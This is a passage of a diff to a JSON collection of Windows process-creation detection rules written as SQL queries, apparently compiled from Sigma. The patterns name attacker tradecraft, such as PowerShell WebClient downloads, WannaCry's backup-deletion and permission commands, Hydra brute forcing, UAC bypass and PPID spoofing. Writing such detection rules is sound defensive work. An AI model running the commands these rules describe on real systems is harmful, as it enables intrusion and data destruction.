Defense Evasion Via Right-to-Left Override", - "id": 
"ad691d92-15f2-4181-9aa4-723c74f9ddc3", + "title": "Use NTFS Short Name in Image", + "id": "3ef5605c-9eb9-47b0-9a71-b727e6aa5c3b", "status": "experimental", - "description": "Detects the presence of the \"u202+E\" character, which causes a terminal, browser, or operating system to render text in a right-to-left sequence.\nThis is used as an obfuscation and masquerading techniques.\n", - "author": "Micah Babinski, @micahbabinski", + "description": "Detect use of the Windows 8.3 short name. Which could be used as a method to avoid Image based detection", + "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1036.002" + "attack.t1564.004" ], "falsepositives": [ - "Commandlines that contains scriptures such as arabic or hebrew might make use of this character" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%‮%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%~1.exe%' ESCAPE '\\' OR NewProcessName LIKE '%~1.bat%' ESCAPE '\\' OR NewProcessName LIKE '%~1.msi%' ESCAPE '\\' OR NewProcessName LIKE '%~1.vbe%' ESCAPE '\\' OR NewProcessName LIKE '%~1.vbs%' ESCAPE '\\' OR NewProcessName LIKE '%~1.dll%' ESCAPE '\\' OR NewProcessName LIKE '%~1.ps1%' ESCAPE '\\' OR NewProcessName LIKE '%~1.js%' ESCAPE '\\' OR NewProcessName LIKE '%~1.hta%' ESCAPE '\\' OR NewProcessName LIKE '%~2.exe%' ESCAPE '\\' OR NewProcessName LIKE '%~2.bat%' ESCAPE '\\' OR NewProcessName LIKE '%~2.msi%' ESCAPE '\\' OR NewProcessName LIKE '%~2.vbe%' ESCAPE '\\' OR NewProcessName LIKE '%~2.vbs%' ESCAPE '\\' OR NewProcessName LIKE '%~2.dll%' ESCAPE '\\' OR NewProcessName LIKE '%~2.ps1%' ESCAPE '\\' OR NewProcessName LIKE '%~2.js%' ESCAPE '\\' OR NewProcessName LIKE '%~2.hta%' ESCAPE '\\') AND NOT ((ParentProcessName LIKE '%\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\' OR ParentProcessName LIKE 
'%\\\\thor\\\\thor64.exe' ESCAPE '\\' OR ParentProcessName LIKE '%-installer.exe' ESCAPE '\\') OR NewProcessName LIKE '%\\\\vcredi%' ESCAPE '\\' OR ParentProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_right_to_left_override.yml" + "filename": "proc_creation_win_susp_ntfs_short_name_use_image.yml" }, { - "title": "UAC Bypass Using IEInstal - Process", - "id": "80fc36aa-945e-4181-89f2-2f907ab6775d", + "title": "Suspicious UltraVNC Execution", + "id": "871b9555-69ca-4993-99d3-35a59f9f3599", "status": "test", - "description": "Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects suspicious UltraVNC command line flag combination that indicate a auto reconnect upon execution, e.g. startup (as seen being used by Gamaredon threat group)", + "author": "Bhabesh Raj", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.lateral_movement", + "attack.g0047", + "attack.t1021.005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND IntegrityLevel IN ('High', 'System') AND ParentProcessName LIKE '%\\\\ieinstal.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%consent.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%-autoreconnect %' ESCAPE '\\' AND CommandLine LIKE '%-connect %' ESCAPE '\\' AND CommandLine LIKE '%-id:%' ESCAPE '\\')" ], - "filename": "proc_creation_win_uac_bypass_ieinstal.yml" + "filename": "proc_creation_win_ultravnc_susp_execution.yml" }, { - "title": "PowerShell DownloadFile", - "id": "8f70ac5f-1f6f-4f8e-b454-db19561216c5", - "status": "test", - "description": "Detects the execution of powershell, a WebClient object creation and the invocation of 
DownloadFile in a single command line", + "title": "HackTool - Htran/NATBypass Execution", + "id": "f5e3b62f-e577-4e59-931e-0a15b2b94e1e", + "status": "experimental", + "description": "Detects exeuctable names or flags used by Htran or Htran-like tools (e.g. NATBypass)", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001", "attack.command_and_control", - "attack.t1104", - "attack.t1105" + "attack.t1090", + "attack.s0040" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%powershell%' ESCAPE '\\' AND CommandLine LIKE '%.DownloadFile%' ESCAPE '\\' AND CommandLine LIKE '%System.Net.WebClient%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\htran.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\lcx.exe' ESCAPE '\\') OR (CommandLine LIKE '%.exe -tran %' ESCAPE '\\' OR CommandLine LIKE '%.exe -slave %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_susp_ps_downloadfile.yml" + "filename": "proc_creation_win_hktl_htran_or_natbypass.yml" }, { - "title": "Formbook Process Creation", - "id": "032f5fb3-d959-41a5-9263-4173c802dc2b", + "title": "Using SettingSyncHost.exe as LOLBin", + "id": "b2ddd389-f676-4ac4-845a-e00781a48e5f", "status": "test", - "description": "Detects Formbook like process executions that inject code into a set of files in the System32 folder, which executes a special command command line to delete the dropper from the AppData Temp folder. 
We avoid false positives by excluding all parent process with command line parameters.", - "author": "Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro", + "description": "Detects using SettingSyncHost.exe to run hijacked binary", + "author": "Anton Kutepov, oscd.community", "tags": [ - "attack.resource_development", - "attack.t1587.001" + "attack.execution", + "attack.defense_evasion", + "attack.t1574.008" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentCommandLine LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ParentCommandLine LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\') AND ParentCommandLine LIKE '%.exe' ESCAPE '\\') AND ((CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%del%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%del%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%/C%' ESCAPE '\\' AND CommandLine LIKE '%type nul >%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\')) AND CommandLine LIKE '%.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')) AND (ParentCommandLine LIKE '%cmd.exe /c%' ESCAPE '\\' AND ParentCommandLine LIKE '%RoamDiag.cmd%' ESCAPE '\\' AND ParentCommandLine LIKE '%-outputpath%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_formbook.yml" + "filename": "proc_creation_win_lolbin_settingsynchost.yml" }, { - "title": "HackTool - Inveigh Execution", - "id": "b99a1518-1ad5-4f65-bc95-1ffff97a8fd0", - 
"status": "experimental", - "description": "Detects the use of Inveigh a cross-platform .NET IPv4/IPv6 machine-in-the-middle tool", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "HackTool - Hydra Password Bruteforce Execution", + "id": "aaafa146-074c-11eb-adc1-0242ac120002", + "status": "test", + "description": "Detects command line parameters used by Hydra password guessing hack tool", + "author": "Vasiliy Burov", "tags": [ "attack.credential_access", - "attack.t1003.001" + "attack.t1110", + "attack.t1110.001" ], "falsepositives": [ - "Very unlikely" + "Software that uses the caret encased keywords PASS and USER in its command line" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\Inveigh.exe' ESCAPE '\\' OR (OriginalFileName LIKE '\\\\Inveigh.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\Inveigh.dll' ESCAPE '\\') OR Description = 'Inveigh' OR (CommandLine LIKE '% -SpooferIP%' ESCAPE '\\' OR CommandLine LIKE '% -ReplyToIPs %' ESCAPE '\\' OR CommandLine LIKE '% -ReplyToDomains %' ESCAPE '\\' OR CommandLine LIKE '% -ReplyToMACs %' ESCAPE '\\' OR CommandLine LIKE '% -SnifferIP%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%-u %' ESCAPE '\\' AND CommandLine LIKE '%-p %' ESCAPE '\\' AND (CommandLine LIKE '%^USER^%' ESCAPE '\\' OR CommandLine LIKE '%^PASS^%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_inveigh.yml" + "filename": "proc_creation_win_hktl_hydra.yml" }, { - "title": "Suspicious WebDav Client Execution", - "id": "982e9f2d-1a85-4d5b-aea4-31f5e97c6555", + "title": "Suspicious New Service Creation", + "id": "17a1be64-8d88-40bf-b5ff-a4f7a50ebcc8", "status": "experimental", - "description": "Detects \"svchost.exe\" spawning \"rundll32.exe\" with command arguments like C:\\windows\\system32\\davclnt.dll,DavSetCookie. 
This could be an indicator of exfiltration or use of WebDav to launch code (hosted on WebDav Server) or potentially a sign of exploitation of CVE-2023-23397\n", - "author": "Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)", + "description": "Detects creation of a new service via \"sc\" command or the powershell \"new-service\" cmdlet with suspicious binary paths", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.exfiltration", - "attack.t1048.003", - "cve.2023.23397" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1543.003" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\windows\\\\system32\\\\davclnt.dll,DavSetCookie%' ESCAPE '\\' AND CommandLine REGEXP '://\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}') AND NOT (((CommandLine LIKE '%://10.%' ESCAPE '\\' OR CommandLine LIKE '%://192.168.%' ESCAPE '\\' OR CommandLine LIKE '%://172.16.%' ESCAPE '\\' OR CommandLine LIKE '%://172.17.%' ESCAPE '\\' OR CommandLine LIKE '%://172.18.%' ESCAPE '\\' OR CommandLine LIKE '%://172.19.%' ESCAPE '\\' OR CommandLine LIKE '%://172.20.%' ESCAPE '\\' OR CommandLine LIKE '%://172.21.%' ESCAPE '\\' OR CommandLine LIKE '%://172.22.%' ESCAPE '\\' OR CommandLine LIKE '%://172.23.%' ESCAPE '\\' OR CommandLine LIKE '%://172.24.%' ESCAPE '\\' OR CommandLine LIKE '%://172.25.%' ESCAPE '\\' OR CommandLine LIKE '%://172.26.%' ESCAPE '\\' OR CommandLine LIKE '%://172.27.%' ESCAPE '\\' OR CommandLine LIKE '%://172.28.%' ESCAPE '\\' OR CommandLine LIKE '%://172.29.%' ESCAPE '\\' OR CommandLine LIKE '%://172.30.%' ESCAPE '\\' OR CommandLine LIKE '%://172.31.%' ESCAPE '\\' OR CommandLine LIKE '%://127.%' ESCAPE '\\' OR CommandLine LIKE '%://169.254.%' ESCAPE '\\'))))" + "SELECT * FROM 
logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' AND CommandLine LIKE '%create%' ESCAPE '\\' AND CommandLine LIKE '%binPath=%' ESCAPE '\\') OR (CommandLine LIKE '%New-Service%' ESCAPE '\\' AND CommandLine LIKE '%-BinaryPathName%' ESCAPE '\\')) AND (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%svchost%' ESCAPE '\\' OR CommandLine LIKE '%dllhost%' ESCAPE '\\' OR CommandLine LIKE '%cmd %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_rundll32_webdav_client_susp_execution.yml" + "filename": "proc_creation_win_susp_service_creation.yml" }, { - "title": "Suspicious Windows Update Agent Empty Cmdline", - "id": "52d097e2-063e-4c9c-8fbb-855c8948d135", - "status": "experimental", - "description": "Detects suspicious Windows Update Agent activity in which a wuauclt.exe process command line doesn't contain any command line flags", - "author": "Florian Roth (Nextron Systems)", + "title": "WannaCry Ransomware Activity", + "id": "41d40bff-377a-43e2-8e1b-2e543069e079", + "status": "test", + "description": "Detects WannaCry ransomware activity", + "author": "Florian Roth (Nextron Systems), Tom U. 
@c_APT_ure (collection), oscd.community, Jonhnathan Ribeiro", + "tags": [ + "attack.lateral_movement", + "attack.t1210", + "attack.discovery", + "attack.t1083", + "attack.defense_evasion", + "attack.t1222.001", + "attack.impact", + "attack.t1486", + "attack.t1490" + ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\Wuauclt.exe' ESCAPE '\\' OR OriginalFileName = 'Wuauclt.exe') AND CommandLine LIKE '%\\\\Wuauclt.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\tasksche.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mssecsvc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\taskdl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\taskhsvc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\taskse.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\111.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\lhdfrgui.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\linuxnew.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wannacry.exe' ESCAPE '\\') OR NewProcessName LIKE '%WanaDecryptor%' ESCAPE '\\' OR (CommandLine LIKE '%icacls%' ESCAPE '\\' AND CommandLine LIKE '%/grant%' ESCAPE '\\' AND CommandLine LIKE '%Everyone:F%' ESCAPE '\\' AND CommandLine LIKE '%/T%' ESCAPE '\\' AND CommandLine LIKE '%/C%' ESCAPE '\\' AND CommandLine LIKE '%/Q%' ESCAPE '\\') OR (CommandLine LIKE '%bcdedit%' ESCAPE '\\' AND CommandLine LIKE '%/set%' ESCAPE '\\' AND CommandLine LIKE '%{default}%' ESCAPE '\\' AND CommandLine LIKE '%recoveryenabled%' ESCAPE '\\' AND CommandLine LIKE '%no%' ESCAPE '\\') OR (CommandLine LIKE '%wbadmin%' ESCAPE '\\' AND CommandLine LIKE '%delete%' ESCAPE '\\' AND CommandLine LIKE '%catalog%' ESCAPE '\\' AND CommandLine LIKE '%-quiet%' ESCAPE '\\') OR CommandLine LIKE '%@Please\\_Read\\_Me@.txt%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_wuauclt_no_cli_flags_execution.yml" + 
"filename": "proc_creation_win_malware_wannacry.yml" }, { - "title": "HackTool - PPID Spoofing SelectMyParent Tool Execution", - "id": "52ff7941-8211-46f9-84f8-9903efb7077d", - "status": "test", - "description": "Detects the use of parent process ID spoofing tools like Didier Stevens tool SelectMyParent", + "title": "Security Privileges Enumeration Via Whoami.EXE", + "id": "97a80ec7-0e2f-4d05-9ef4-65760e634f6b", + "status": "experimental", + "description": "Detects a whoami.exe executed with the /priv command line flag instructing the tool to show all current user privileges. This is often used after a privilege escalation attempt.", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1134.004" + "attack.privilege_escalation", + "attack.discovery", + "attack.t1033" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SelectMyParent.exe' ESCAPE '\\' OR (CommandLine LIKE '%PPID-spoof%' ESCAPE '\\' OR CommandLine LIKE '%ppid\\_spoof%' ESCAPE '\\' OR CommandLine LIKE '%spoof-ppid%' ESCAPE '\\' OR CommandLine LIKE '%spoof\\_ppid%' ESCAPE '\\' OR CommandLine LIKE '%ppidspoof%' ESCAPE '\\' OR CommandLine LIKE '%spoofppid%' ESCAPE '\\' OR CommandLine LIKE '%spoofedppid%' ESCAPE '\\' OR CommandLine LIKE '% -spawnto %' ESCAPE '\\') OR (OriginalFileName LIKE '%PPID-spoof%' ESCAPE '\\' OR OriginalFileName LIKE '%ppid\\_spoof%' ESCAPE '\\' OR OriginalFileName LIKE '%spoof-ppid%' ESCAPE '\\' OR OriginalFileName LIKE '%spoof\\_ppid%' ESCAPE '\\' OR OriginalFileName LIKE '%ppidspoof%' ESCAPE '\\' OR OriginalFileName LIKE '%spoofppid%' ESCAPE '\\' OR OriginalFileName LIKE '%spoofedppid%' ESCAPE '\\') OR Description = 'SelectMyParent' OR Imphash IN ('04d974875bd225f00902b4cad9af3fbc', 'a782af154c9e743ddf3f3eb2b8f3d16e', '89059503d7fbf470e68f7e63313da3ad', 'ca28337632625c8281ab8a130b3d6bad') OR (Hashes LIKE 
'%IMPHASH=04D974875BD225F00902B4CAD9AF3FBC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=A782AF154C9E743DDF3F3EB2B8F3D16E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=89059503D7FBF470E68F7E63313DA3AD%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=CA28337632625C8281AB8A130B3D6BAD%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR OriginalFileName = 'whoami.exe') AND (CommandLine LIKE '% /priv%' ESCAPE '\\' OR CommandLine LIKE '% -priv%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_selectmyparent.yml" + "filename": "proc_creation_win_whoami_priv_discovery.yml" }, { - "title": "DNS RCE CVE-2020-1350", - "id": "b5281f31-f9cc-4d0d-95d0-45b91c45b487", + "title": "Shells Spawned by Web Servers", + "id": "8202070f-edeb-4d31-a010-a26c72ac5600", "status": "test", - "description": "Detects exploitation of DNS RCE bug reported in CVE-2020-1350 by the detection of suspicious sub process", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects web servers that spawn shell processes which could be the result of a successfully placed web shell or another attack", + "author": "Thomas Patzke, Florian Roth (Nextron Systems), Zach Stanford @svch0st, Tim Shelton, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.initial_access", - "attack.t1190", - "attack.execution", - "attack.t1569.002" + "attack.persistence", + "attack.t1505.003", + "attack.t1190" ], "falsepositives": [ - "Unknown but benign sub processes of the Windows DNS service dns.exe" + "Particular web applications may spawn a shell process legitimately" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\System32\\\\dns.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\System32\\\\werfault.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\System32\\\\conhost.exe' ESCAPE '\\' OR NewProcessName LIKE 
'%\\\\System32\\\\dnscmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\System32\\\\dns.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((ParentProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\php.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\caddy.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\ws\\_TomcatService.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\tomcat.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\UMWorkerProcess.exe' ESCAPE '\\') OR ((ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentProcessName LIKE '%-tomcat-%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\tomcat%' ESCAPE '\\')) OR ((ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentCommandLine LIKE '%catalina.jar%' ESCAPE '\\' OR ParentCommandLine LIKE '%CATALINA\\_HOME%' ESCAPE '\\' OR ParentCommandLine LIKE '%catalina.home%' ESCAPE '\\'))) AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\arp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\at.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dsget.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dsquery.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\find.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\findstr.exe' 
ESCAPE '\\' OR NewProcessName LIKE '%\\\\fsutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hostname.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ipconfig.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\nbtstat.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\netdom.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\netstat.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\nltest.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\nslookup.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ntdutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pathping.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ping.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\qprocess.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\query.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\qwinsta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\tasklist.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\tracert.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ver.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wevtutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wusa.exe' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%Windows\\\\system32\\\\cmd.exe /c C:\\\\ManageEngine\\\\ADManager \"Plus\\\\ES\\\\bin\\\\elasticsearch.bat -Enode.name=RMP-NODE1 -pelasticsearch-pid.txt' ESCAPE '\\') OR (CommandLine LIKE '%sc query%' ESCAPE '\\' AND CommandLine LIKE '%ADManager Plus%' ESCAPE '\\')))" ], - "filename": 
"proc_creation_win_exploit_cve_2020_1350.yml" + "filename": "proc_creation_win_webshell_spawn.yml" }, { - "title": "Renamed Jusched.EXE Execution", - "id": "edd8a48c-1b9f-4ba1-83aa-490338cd1ccb", - "status": "test", - "description": "Detects the execution of a renamed \"jusched.exe\" as seen used by the cobalt group", - "author": "Markus Neis, Swisscom", + "title": "Suspicious Parent Double Extension File Execution", + "id": "5e6a80c8-2d45-4633-9ef4-fa2671a39c5c", + "status": "experimental", + "description": "Detect execution of suspicious double extension files in ParentCommandLine", + "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", "attack.defense_evasion", - "attack.t1036.003" + "attack.t1036.007" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND Description IN ('Java Update Scheduler', 'Java(TM) Update Scheduler') AND NOT (NewProcessName LIKE '%\\\\jusched.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%.doc.lnk' ESCAPE '\\' OR ParentProcessName LIKE '%.docx.lnk' ESCAPE '\\' OR ParentProcessName LIKE '%.xls.lnk' ESCAPE '\\' OR ParentProcessName LIKE '%.xlsx.lnk' ESCAPE '\\' OR ParentProcessName LIKE '%.ppt.lnk' ESCAPE '\\' OR ParentProcessName LIKE '%.pptx.lnk' ESCAPE '\\' OR ParentProcessName LIKE '%.rtf.lnk' ESCAPE '\\' OR ParentProcessName LIKE '%.pdf.lnk' ESCAPE '\\' OR ParentProcessName LIKE '%.txt.lnk' ESCAPE '\\' OR ParentProcessName LIKE '%.doc.js' ESCAPE '\\' OR ParentProcessName LIKE '%.docx.js' ESCAPE '\\' OR ParentProcessName LIKE '%.xls.js' ESCAPE '\\' OR ParentProcessName LIKE '%.xlsx.js' ESCAPE '\\' OR ParentProcessName LIKE '%.ppt.js' ESCAPE '\\' OR ParentProcessName LIKE '%.pptx.js' ESCAPE '\\' OR ParentProcessName LIKE '%.rtf.js' ESCAPE '\\' OR ParentProcessName LIKE '%.pdf.js' ESCAPE '\\' OR ParentProcessName LIKE '%.txt.js' ESCAPE 
'\\') OR (ParentCommandLine LIKE '%.doc.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.docx.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.xls.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.xlsx.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.ppt.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.pptx.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.rtf.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.pdf.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.txt.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.doc.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.docx.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.xls.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.xlsx.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.ppt.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.pptx.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.rtf.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.pdf.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.txt.js%' 